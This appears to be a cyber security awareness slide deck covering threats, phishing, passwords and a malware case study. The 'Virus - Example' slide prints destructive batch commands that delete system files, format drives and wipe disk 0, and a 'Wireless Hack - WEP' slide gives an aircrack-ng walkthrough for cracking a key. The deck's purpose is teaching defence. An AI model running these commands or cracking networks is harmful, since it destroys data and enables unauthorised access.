CYBER SECURITY AWARENESS
Ali Payani
THERE IS NO NEXT TIME, IT’S NOW OR NEVER.
“As the world is increasingly
interconnected, everyone shares the
responsibility of securing
cyberspace.”
-Newton Lee
OUTLINE
• What is Computer Security
• Importance of Security
• Small business
• Cyber Security Statistics
• You are the target
• Cyber Scam
• 10 scams to watch out
• Leading Threats
• Password
• Keylogger
• Sniffing
• Phishing
• Security Plan
• Case – Malware
• Security issues
WHAT IS COMPUTER SECURITY ?
• Securing Computers, Smartphones, Networks, Internet.
• Defending information from unauthorized access, use,
disclosure, disruption, modification, perusal, inspection,
recording or destruction, unplanned events and natural
disasters.
IMPORTANCE OF SECURITY
• The internet allows an attacker to attack from anywhere on
the planet.
• Governments, military, corporations, financial institutions,
hospitals and other businesses collect, process and store a
great deal of confidential information on computers and
transmit that data across networks to other computers. With
the growing volume and sophistication of cyber attacks,
ongoing attention is required to protect sensitive business
and personal information.
• Risks caused by poor security knowledge and practice:
• Identity Theft
• Monetary Theft
• Legal Ramifications (for yourself and companies)
• Termination if company policies are not followed
• One of the best ways to make sure company employees will not make costly errors in
regard to information security is to institute company-wide security-awareness training
(SANS)
MOST SMALL BUSINESSES DON’T RECOVER
FROM CYBERCRIME
• 60% of small businesses will shutter within half a year after being victimized by
cybercrime.
• 90% do not have an internal IT manager for security
• 87% do not have a formal written security policy
• http://smallbusiness.foxbusiness.com/technology-web/2013/03/21/most-small-businesses-dont-recover-from-cybercrime/
STATISTICS
• 91% increase in attacks 2013 (Symantec)
• 62% increase in the number of breaches in 2013
• (Facebook)
• Over 552M identities were exposed via breaches in 2013 (493%+ 2012)
• 38% of mobile users have experienced mobile cybercrime in past 12 months
• 1 in 392 emails contains a phishing attack
• 86% of all websites had at least one vulnerability
• Most Data Breaches (Retail/Merchant=15M , Financial/Insurance=8M, Other=6M)
STATISTICS
• 100M phishing messages every day (Agari)
• 3 billion phishing messages monthly
• Phishing costs $70.2 billion (Cisco)
• Phishing costs corporate IT $28.1 billion (IID)
• 25% increase in Email Malware as URL
• 1 in 196 Email Virus Rate
• 1 in 566 websites with malware
• 62% of UAE users cannot recognize a phishing message (Gulf News, Kaspersky 2012)
• 70% of phishing messages targeted bank accounts (RSA, 2013)
YOU ARE THE TARGET
• Explain to end users that they are the target. Far too often people have the misconception
that they are not a target, that their information or their computers have no value to
attackers. Of course we know this to be false. Anyone with an identity, computer or private
information is a target; cyber criminals have made an entire industry of hacking the end
user.
1- users know and understand they
are being actively targeted
2- risks exist regardless if they are at
work or at home
3- Don’t Be scared, Just Drive Safe !
CYBER SCAM
• Due to the high use of the internet, cyber scams have
disrupted bank accounts, sent viruses, and stolen
personal information.
• Most cyber scams are sent through an e-mail account
wherein individuals will open the e-mail to either find a
virus has been put into their computer or to read
misleading information.
• Never enter personal information or credit card
information on unsecure websites, never reply to or click
on any links that you are not affiliated with, and never
respond to an e-mail or advertisement saying you have
won something.
• Rugby World Cup 2015 , World Cup 2014 Brazil,
Auction sites, Jobs and training courses, Business 2
Business, Phishing
LEADING THREATS
• Virus
• Worm
• Trojan Horse
• Social engineering
VIRUS
• A virus attaches itself to a program, file, or disk. When the program is executed, the virus
activates and replicates itself.
• Viruses result in crashing of computers and loss of data.
• In order to recover from or prevent virus attacks:
• Avoid potentially unreliable websites/emails
• System Restore
• Re-install operating system
• Anti-virus (e.g. Avira, AVG, Norton)
[Diagram: Program A, carrying extra code, infects Program B]
VIRUS - EXAMPLE
> @echo off
> del %systemdrive%*.*/f/s/q
> shutdown -r -f -t 00
> xxx.bat
> -----------
> @echo off
> for %%i in (c ,d:,e:,f:,g:) do format %%i /FS:NTFS /x /q
> -----------
> diskpart
> > list disk
> select disk 0
> clean
> create partition primary
> format fs=fat32 quick
> @echo off )))
> attrib -r -s -h c:autoexec.bat )))
> del c:autoexec.bat )))
> attrib -r -s -h c:boot.ini )))
> del c:boot.ini )))
> attrib -r -s -h c:ntldr ))
> del c:ntldr )))
> attrib -r -s -h c:windowswin.ini )))
> del c:windowswin.ini )))
> @echo off ))))
> ((((----shutdown -s -t 10 -c " "-----)))))
WORM
• Independent program which replicates itself and sends copies
from computer to computer across network connections.
Upon arrival the worm may be activated to replicate.
[Diagram: the worm reads the email list (Joe@gmail.com, Ann@yahoo.com, Bob@uwp.edu) and sends a copy of itself to Joe, to Ann and to Bob]
TROJAN HORSE
• Masquerades as beneficial program while
quietly destroying data or damaging your
system.
• Download a game: Might be fun but has
hidden part that emails your password file
without you knowing.
SOCIAL ENGINEERING
Social engineering manipulates people into performing actions or
divulging confidential information. Similar to a confidence trick or
simple fraud, the term applies to the use of deception to gain
information, commit fraud, or access computer systems.
• Phone Call: This is John, the System Admin. What is your
password?
• In Person: What ethnicity are you? Your mother’s maiden name?
• I have come to repair your machine…and have some software
patches
• Email: ABC Bank has noticed a problem with your account…
PASSWORD
• 1- It’s tough to create and remember strong passwords for each
online system or site you access.
• 2- It’s a BAD idea though to use the same password for several or
all systems and sites
• 3- A strong password contains 8 characters, a mixture of uppercase and lowercase
letters, at least one number and one non-alphanumeric character or
symbol (5P0ky!3Z)
• A. Never share your password or write it down or save it!
• B. Strong Password
• C. Don’t use common words
• D. Change your password
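An added example, not part of the original slides: a Python check that applies the composition rule from point 3 together with rule C, showing that a password can satisfy the character mix and still be a disguised common word. The short word list and the substitution table are assumptions made for illustration; a real check would load a large list of common and breached passwords.

```python
# Assumption: a tiny stand-in for a real common/breached password list.
COMMON_WORDS = {"password", "welcome", "letmein", "qwerty", "admin", "dragon"}

# Assumption: typical substitutions people use to dress up a plain word.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})


def composition_problems(password):
    """Return the parts of rule 3 (length and character mix) that are not met."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c.isdigit() for c in password):
        problems.append("no number")
    if not any(not c.isalnum() for c in password):
        problems.append("no symbol")
    return problems


def hidden_common_word(password):
    """Return the common word the password is built on, or None (rule C)."""
    normalized = password.lower().translate(LEET)
    # Drop whatever is still not a letter, e.g. a trailing digit.
    letters = "".join(c for c in normalized if c.isalpha())
    for word in sorted(COMMON_WORDS):
        if word in letters:
            return word
    return None


def check_password(password):
    """Return every reason the password fails; an empty list means it passes."""
    problems = composition_problems(password)
    word = hidden_common_word(password)
    if word:
        problems.append(f"based on common word '{word}'")
    return problems


if __name__ == "__main__":
    # "5P0ky!3Z" is the slide's own sample; the others are constructed.
    for candidate in ["5P0ky!3Z", "P@ssw0rd1", "W3lc0me!2", "summer"]:
        result = check_password(candidate)
        print(f"{candidate:12} {'OK' if not result else '; '.join(result)}")
```

`P@ssw0rd1` meets every part of the composition rule and is rejected only by the common-word check, which is why the two rules have to be applied together.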
KEY LOGGER
• Bit of software that gets installed on your computer
unbeknownst to you, and starts logging everything that you
enter into the computer. This type of malware will often send
usernames and passwords back to the attacker, who can then
use this information to get into your bank accounts, social
media accounts, and really anything that would require a
username and password.
• Protect:
• 1- Antivirus
• 2- Firewall
• 3- Malwarebytes
SNIFFING
• A sniffer is an application or device that can read, monitor,
and capture network data exchanges and read network
packets. If the packets are not encrypted, a sniffer provides
a full view of the data inside the packet. Even encapsulated
(tunneled) packets can be broken open and read unless
they are encrypted and the attacker does not have access
to the key.
PHISHING
• The act of sending an email to a user falsely claiming to be
an established legitimate enterprise in an attempt to scam
the user into surrendering private information that will be
used for identity theft.
PHISHING
• Most Phished Website:
• .Facebook.com
• .www.emiratesnbd.com/en/
• .Business Conference
• .Facebook.com/Bestcars2015
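An added example, not part of the original slides: a Python check of whether a link in a message really leads to the enterprise it claims to be, which is the deception the phishing definition above describes. The trusted domains are taken from the sites named on the slide; the sample links are constructed, and the plain suffix match is a simplifying assumption.

```python
from urllib.parse import urlsplit

# Trusted domains, taken from the sites named on the slide.
TRUSTED = {"facebook": "facebook.com", "emiratesnbd": "emiratesnbd.com"}

# Constructed sample: (visible text, href) pairs as pulled from a message.
SAMPLE_LINKS = [
    ("Facebook", "https://www.facebook.com/login"),
    ("Verify your account", "http://emiratesnbd.com.account-verify.example/en/"),
    ("www.emiratesnbd.com/en/", "http://203.0.113.7/en/"),
    ("Log in", "https://www.facebook.com@login.example.net/"),
    ("Newsletter", "https://news.example.org/"),
]


def host_of(url):
    """Lower-cased hostname of a URL, without port or userinfo."""
    return (urlsplit(url).hostname or "").rstrip(".").lower()


def belongs_to(host, domain):
    """True if host is the domain itself or one of its subdomains."""
    return host == domain or host.endswith("." + domain)


def classify_link(url):
    """Return 'trusted', 'lookalike' or 'unrelated' for one link."""
    host = host_of(url)
    if any(belongs_to(host, d) for d in TRUSTED.values()):
        return "trusted"
    # Look at the whole authority part, so a brand placed before "@"
    # or inside a longer hostname is still noticed.
    authority = urlsplit(url).netloc.lower()
    squashed = authority.replace("-", "").replace(".", "")
    if any(brand in squashed for brand in TRUSTED):
        return "lookalike"
    return "unrelated"


def audit_links(links):
    """Return (href, reason) for every link that misrepresents its destination."""
    findings = []
    for text, href in links:
        verdict = classify_link(href)
        claimed = [d for d in TRUSTED.values() if d in text.lower()]
        if verdict == "lookalike":
            findings.append((href, "host imitates a trusted brand"))
        elif claimed and verdict != "trusted":
            findings.append((href, f"text shows {claimed[0]} but link goes elsewhere"))
    return findings


if __name__ == "__main__":
    for href, reason in audit_links(SAMPLE_LINKS):
        print(f"{href}  ->  {reason}")
```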
SECURITY PLAN
• Every company needs to have a security program
• 1- No matter how large or small your company is
• 2- you need to have a plan to ensure the security of your
information assets
• how you will mitigate them, and planning for how you keep the
program and your security practices up to date.
• Risk Assessment
• Policies and Procedures (CIA)
• Awareness
• Audit
• Business Continuity (BC, CP, IR)
CASE - MALWARE INFECTION
• Logan Industries
• is a multi-national catalog sale corporation with offices in 30 states
• most offices are small, with fewer than 50 employees,
• First Infection: Monday, Feb. 5 :
• 20 employees at a satellite sales office received an email from the CEO and
President Andrew James with the message.
• Twenty employees experienced a computer shut-down a short time later
• wait for the help desk to contact them about fixing their machines
• The Virus Spreads: Tuesday, Feb. 6
• Early in the morning, the infection had spread from dozens of computers to
hundreds.
• After sending itself, it would cause the machine to reboot and never to recover.
• By 10 a.m., the CIO had been called and decided to form a team to deal with the
virus.
• Late Afternoon: Wednesday, February 7th
• find BadBoy on the disk drive and clean any infected files.
• they spent from five to 10 minutes manually removing the virus code from all file
locations.
• Users at Logan Industries had now been without access to a computer for three days
and were getting frustrated.
• The CEO requested a report
from the CIO. The report
included the following costs.
• They didn’t have any security
awareness for their employees
• The ability to describe the business
impact of virus/worm infection
• A comprehension of the
responsibilities of an IT staff in
delivering a secure environment
• The steps to respond to and recover
from a malware infection
WIRELESS HACK - WEP
• Sudo apt-install aircrack-ng
• Iwconfig scan
• Airmon-ng start Wlan0
• airodump-ng mon0
• //airodump-ng -c channel -w filetosave –bssid macaddrs mon0
• airodump-ng -c 6 -w d.data –bssid 11:22:33:44:55 mon0
• //aireplay-ng -10 -a bssid mon0
• aireplay-ng -1 0 -a 00:18:98:23:34:86 mon0
• //aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
• aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:98:23:34:86 mon0
• aircrack-ng filename.cap
• aircrack-ng wep-01.cap
• KEY FOUND! [ 11:11:11:11:11 ]
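The defensive follow-up to this slide is to find any access point of your own that still offers WEP. An added example, not part of the original slides: it parses text in the format printed by `iwlist scan` and reports cells that are open or that have encryption on but advertise no WPA/WPA2 element, which is how WEP appears in that output. The scan text, addresses and ESSIDs are constructed sample data.

```python
import re

# Constructed sample in the layout printed by `iwlist <interface> scan`.
SAMPLE_SCAN = """\
wlan0     Scan completed :
          Cell 01 - Address: 02:00:00:AA:00:01
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Encryption key:on
                    ESSID:"warehouse"
          Cell 02 - Address: 02:00:00:AA:00:02
                    Channel:11
                    Encryption key:on
                    ESSID:"office"
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
          Cell 03 - Address: 02:00:00:AA:00:03
                    Channel:1
                    Encryption key:off
                    ESSID:"guest"
"""

CELL_RE = re.compile(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})")


def parse_cells(scan_text):
    """Split scan output into one dict per access point."""
    cells = []
    current = None
    for raw in scan_text.splitlines():
        line = raw.strip()
        match = CELL_RE.match(line)
        if match:
            current = {"bssid": match.group(1), "essid": "", "channel": None,
                       "encrypted": False, "wpa": False}
            cells.append(current)
        elif current is None:
            continue  # header lines before the first cell
        elif line.startswith("ESSID:"):
            current["essid"] = line[len("ESSID:"):].strip('"')
        elif line.startswith("Channel:"):
            current["channel"] = int(line.split(":", 1)[1])
        elif line.startswith("Encryption key:"):
            current["encrypted"] = line.endswith("on")
        elif line.startswith("IE:") and "WPA" in line:
            current["wpa"] = True  # matches both WPA and WPA2 elements
    return cells


def protection(cell):
    """Classify a cell as 'open', 'wep' or 'wpa'."""
    if not cell["encrypted"]:
        return "open"
    return "wpa" if cell["wpa"] else "wep"


def weak_networks(scan_text):
    """Return (essid, bssid, protection) for every cell that is not WPA/WPA2."""
    return [(c["essid"], c["bssid"], protection(c))
            for c in parse_cells(scan_text) if protection(c) != "wpa"]


if __name__ == "__main__":
    for essid, bssid, kind in weak_networks(SAMPLE_SCAN):
        print(f"{essid:12} {bssid}  {kind.upper()}: move to WPA2 or retire")
```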
SECURITY ISSUES
• Back up
• Unknown file
• Working in public places
• Training, Training, Training
• Security Policy
• Passwords
• Wireless Security
• USB
• Secure your accounts
• Online Banking

 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 

CYBER SECURITY AWARENESS

  • 1. CYBER SECURITY AWARENESS Ali Payani THERE IS NO NEXT TIME, IT’S NOW OR NEVER.
  • 2. “As the world is increasingly interconnected, everyone shares the responsibility of securing cyberspace.” -Newton Lee
  • 3. OUTLINE • What is Computer Security • Importance of Security • Small business • Cyber Security Statistics • You are the target • Cyber Scam • 10 scams to watch out • Leading Threats • Password • Keylogger • Sniffing • Phishing • Security Plan • Case – Malware • Security issues
  • 4. WHAT IS COMPUTER SECURITY ? • Securing Computers, Smartphones, Networks, Internet. • defending information from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction, unplanned events and natural disasters.
  • 5. IMPORTANCE OF SECURITY • The internet allows an attacker to attack from anywhere on the planet. • Governments, military, corporations, financial institutions, hospitals and other businesses collect, process and store a great deal of confidential information on computers and transmit that data across networks to other computers. With the growing volume and sophistication of cyber attacks, ongoing attention is required to protect sensitive business and personal information. • Risks caused by poor security knowledge and practice: • Identity Theft • Monetary Theft • Legal Ramifications (for yourself and companies) • Termination if company policies are not followed
  • 6. • One of the best ways to make sure company employees will not make costly errors in regard to information security is to institute company-wide security-awareness training (SANS)
  • 7. MOST SMALL BUSINESSES DON’T RECOVER FROM CYBERCRIME • 60% of small businesses will shutter within half a year after being victimized by cybercrime. • 90% do not have an internal IT manager for security • 87% do not have a formal written security policy • http://smallbusiness.foxbusiness.com/technology-web/2013/03/21/most-small-businesses-dont-recover-from-cybercrime/
  • 8. STATISTICS • 91% increase in attacks in 2013 (Symantec) • 62% increase in the number of breaches in 2013 • (Facebook) • Over 552M identities were exposed via breaches in 2013 (493%+ 2012) • 38% of mobile users have experienced mobile cybercrime in the past 12 months • 1 in 392 emails contains a phishing attack • 86% of all websites had at least one vulnerability • Most Data Breaches (Retail/Merchant=15M, Financial/Insurance=8M, Other=6M)
  • 9. STATISTICS • 100M phishing messages every day (Agari) • 3 billion phishing messages monthly • Phishing costs $70.2 billion (Cisco) • Phishing costs corporate IT $28.1 billion (IID) • 25% increase in email malware as URL • 1 in 196 email virus rate • 1 in 566 websites with malware • 62% of UAE users cannot recognize a phishing message (Gulf News, Kaspersky 2012) • 70% of phishing messages targeted bank accounts (RSA, 2013)
  • 10. YOU ARE THE TARGET • Explain to end users that they are the target. Far too often people have the misconception that they are not a target, that their information or their computers have no value to attackers. Of course we know this to be false. Anyone with an identity, computer or private information is a target; cyber criminals have made an entire industry of hacking the end user. 1- Users know and understand they are being actively targeted 2- Risks exist regardless of whether they are at work or at home 3- Don’t be scared, just drive safe!
  • 11. CYBER SCAM • Due to the high use of the internet, cyber scams have disrupted bank accounts, sent viruses, and stolen personal information. • Most cyber scams are sent through e-mail: individuals open the e-mail and either find that a virus has been put onto their computer or read misleading information. • Never enter personal information or credit card information on unsecure websites, never reply to or click on any links that you are not affiliated with, and never respond to an e-mail or advertisement saying you have won something. • Rugby World Cup 2015, World Cup 2014 Brazil, Auction sites, Jobs and training courses, Business 2 Business, Phishing
  • 12. LEADING THREATS • Virus • Worm • Trojan Horse • Social engineering
  • 13. VIRUS • A virus attaches itself to a program, file, or disk. When the program is executed, the virus activates and replicates itself. • Viruses result in crashing of computers and loss of data. • In order to recover/prevent virus/attacks: • Avoid potentially unreliable websites/emails • System Restore • Re-install operating system • Anti-virus (e.g. Avira, AVG, Norton) • (Figure: Program A, extra code, infects Program B)
  • 14. VIRUS - EXAMPLE > @echo off > del %systemdrive%*.*/f/s/q > shutdown -r -f -t 00 > xxx.bat > ----------- > @echo off > for %%i in (c ,d:,e:,f:,g:) do format %%i /FS:NTFS /x /q > ----------- > diskpart > > list disk > select disk 0 > clean > create partition primary > format fs=fat32 quick > @echo off ))) > attrib -r -s -h c:autoexec.bat ))) > del c:autoexec.bat ))) > attrib -r -s -h c:boot.ini ))) > del c:boot.ini ))) > attrib -r -s -h c:ntldr )) > del c:ntldr ))) > attrib -r -s -h c:windowswin.ini ))) > del c:windowswin.ini ))) > @echo off )))) > ((((----shutdown -s -t 10 -c " "-----)))))
  • 15. WORM • Independent program which replicates itself and sends copies from computer to computer across network connections. Upon arrival the worm may be activated to replicate. To Joe To Ann To Bob Email List: Joe@gmail.com Ann@yahoo.com Bob@uwp.edu
  • 16. TROJAN HORSE • Masquerades as beneficial program while quietly destroying data or damaging your system. • Download a game: Might be fun but has hidden part that emails your password file without you knowing.
  • 17. SOCIAL ENGINEERING Social engineering manipulates people into performing actions or divulging confidential information. Similar to a confidence trick or simple fraud, the term applies to the use of deception to gain information, commit fraud, or access computer systems. • Phone Call: This is John, the System Admin. What is your password? • In Person: What ethnicity are you? Your mother’s maiden name? • I have come to repair your machine…and have some software patches • Email: ABC Bank has noticed a problem with your account…
  • 18. PASSWORD • 1- It’s tough to create and remember strong passwords for each online system or site you access. • 2- It’s a BAD idea, though, to use the same password for several or all systems and sites • 3- Contains 8 characters, a mixture of uppercase and lowercase letters, at least one number and one non-alphanumeric character or symbol (5P0ky!3Z) • A. Never share your password or write it down or save it! • B. Strong password • C. Don’t use common words • D. Change your password
  • 19. KEY LOGGER • A bit of software that gets installed on your computer unbeknownst to you and starts logging everything that you enter into the computer. This type of malware will often send usernames and passwords back to the attacker, who can then use this information to get into your bank accounts, social media accounts, and really anything that would require a username and password. • Protect: • 1- Anti-virus • 2- Firewall • 3- Malwarebytes
  • 20. SNIFFING • A sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets. If the packets are not encrypted, a sniffer provides a full view of the data inside the packet. Even encapsulated (tunneled) packets can be broken open and read unless they are encrypted and the attacker does not have access to the key.
  • 21. PHISHING • The act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
  • 22. PHISHING • Most Phished Website: • .Facebook.com • .www.emiratesnbd.com/en/ • .Business Conference • .Facebook.com/Bestcars2015
  • 23. SECURITY PLAN • Every company needs to have a security program • 1- No matter how large or small your company is • 2- you need to have a plan to ensure the security of your information assets • how you will mitigate them, and planning for how you keep the program and your security practices up to date. • Risk Assessment • Policies and Procedures (CIA) • Awareness • Audit • Business Continuity (BC, CP, IR)
  • 24. CASE - MALWARE INFECTION • Logan Industries • is a multi-national catalog sale corporation with offices in 30 states • most offices are small, with fewer than 50 employees, • First Infection: Monday, Feb. 5 : • 20 employees at a satellite sales office received an email from the CEO and President Andrew James with the message. • Twenty employees experienced a computer shut-down a short time later • wait for the help desk to contact them about fixing their machines • The Virus Spreads: Tuesday, Feb. 6 • Early in the morning, the infection had spread from dozens of computers to hundreds. • After sending itself, it would cause the machine to reboot and never to recover.
  • 25. • By 10 a.m., the CIO had been called and decided to form a team to deal with the virus. • Late Afternoon: Wednesday, February, 7th • find BadBoy on the disk drive and clean any infected files. • they spent from five to 10 minutes manually removing the virus code from all file locations. • Users at Logan Industries had now been without access to a computer for three days and were getting frustrated.
  • 26. • The CEO requested a report from the CIO. The report included the following costs. • They didn’t have any security awareness for their employees • The ability to describe the business impact of virus/worm infection • A comprehension of the responsibilities of an IT staff in delivering a secure environment • The steps to respond to and recover from a malware infection
  • 27. WIRELESS HACK - WEP • Sudo apt-install aircrack-ng • Iwconfig scan • Airmon-ng start Wlan0 • airodump-ng mon0 • //airodump-ng -c channel -w filetosave –bssid macaddrs mon0 • airodump-ng -c 6 -w d.data –bssid 11:22:33:44:55 mon0 • //aireplay-ng -10 -a bssid mon0 • aireplay-ng -1 0 -a 00:18:98:23:34:86 mon0 • //aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0 • aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:98:23:34:86 mon0 • aircrack-ng filename.cap • aircrack-ng wep-01.cap • KEY FOUND! [ 11:11:11:11:11 ]
  • 28. SECURITY ISSUES • Back up • Unknown file • Working on public place • Training, Training, Training • Security Policy • Passwords • Wireless Security • USB • Secure your accounts • Online Banking
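
The password rules on slide 18 can be checked mechanically. The sketch below is an added example, not part of the original deck: it tests the composition rule from point 3 and the "Don't use common words" rule from point C. The word list and the character-substitution table are constructed assumptions, and `policy_violations` is a hypothetical helper name. It shows that a password can satisfy every composition rule and still be a common word in disguise.

```python
import re

# Constructed sample deny-list (assumption); a real deployment would load
# a much larger list of common and breached passwords.
COMMON_WORDS = {"password", "welcome", "qwerty", "letmein", "admin", "dragon"}

# Assumed substitution table: undo common character swaps so that
# "P@ssw0rd" is compared as "password".
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})


def policy_violations(password):
    """Return the slide-18 rules that `password` breaks (empty list = passes)."""
    problems = []
    # Point 3: length and character-class requirements.
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    if not re.search(r"[A-Z]", password):
        problems.append("no uppercase letter")
    if not re.search(r"[a-z]", password):
        problems.append("no lowercase letter")
    if not re.search(r"[0-9]", password):
        problems.append("no number")
    if not re.search(r"[^A-Za-z0-9]", password):
        problems.append("no symbol")
    # Point C: look for a common word after lower-casing, undoing the
    # substitutions and dropping anything that is still not a letter.
    normalized = password.lower().translate(LEET)
    letters_only = re.sub(r"[^a-z]", "", normalized)
    for word in sorted(COMMON_WORDS):
        if word in letters_only:
            problems.append("contains common word '%s'" % word)
    return problems


if __name__ == "__main__":
    # "5P0ky!3Z" is the sample from slide 18; the others are constructed.
    for candidate in ("5P0ky!3Z", "P@ssw0rd1!", "summer"):
        print(candidate, "->", policy_violations(candidate) or "passes")
```

The constructed input `P@ssw0rd1!` passes every composition check and is rejected only by the common-word check, which is why point C matters alongside point 3.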